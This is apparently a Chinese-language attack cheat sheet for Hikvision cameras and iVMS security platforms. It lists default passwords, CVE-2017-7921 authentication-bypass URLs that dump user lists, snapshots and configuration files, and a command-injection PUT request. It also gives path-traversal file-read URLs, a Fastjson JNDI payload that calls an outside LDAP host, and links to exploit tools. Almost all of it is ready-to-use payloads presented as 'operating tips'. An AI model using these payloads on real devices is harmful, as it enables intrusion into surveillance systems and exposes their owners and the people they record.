弱口令问题

• 操作技巧：默认用户名与密码：admin:12345/8888888
• 受影响版本：大部分设备

身份验证绕过

• 操作技巧：获取所有用户列表：http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK获取摄像头快照：http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK下载并解密摄像机配置文件：http://ip/System/configurationFile?auth=YWRtaW46MTEK解密工具：https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
• 
  

github 描述截图

• 受影响版本：大部分设备

命令注入问题

• 操作技巧：通过以下PUT请求注入命令：

PUT /SDK/webLanguage HTTP/1.1
Host: x.x.x.x
...
<?xml version="1.0" encoding="UTF-8"?>

    $(ifconfig -a > webLib/dd.asp)

• 结果保存在dd.asp中，直接访问即可。
• 受影响版本：大部分设备

后台任意文件读取

• 操作技巧：

http://ip/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

• 受影响版本：流媒体管理服务器 V2.3.5

任意文件上传

• 操作技巧：检测工具：https://github.com/sccmdaveli/hikvision-poc

github描述截图

• 受影响版本：

海康威视综合安防系统iVMS-5000

海康威视综合安防系统 iVMS-8700

Fastjson远程命令执行

• 操作技巧：通过以下POST请求执行远程命令：

POST /bic/ssoService/v1/applyCT HTTP/1.1
...
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}

• 受影响版本：大部分设备

信息泄露

• 操作技巧：访问/api/video/v2/cameras/previewURLs，检查是否返回rtsp数据流地址。
• 受影响版本：大部分设备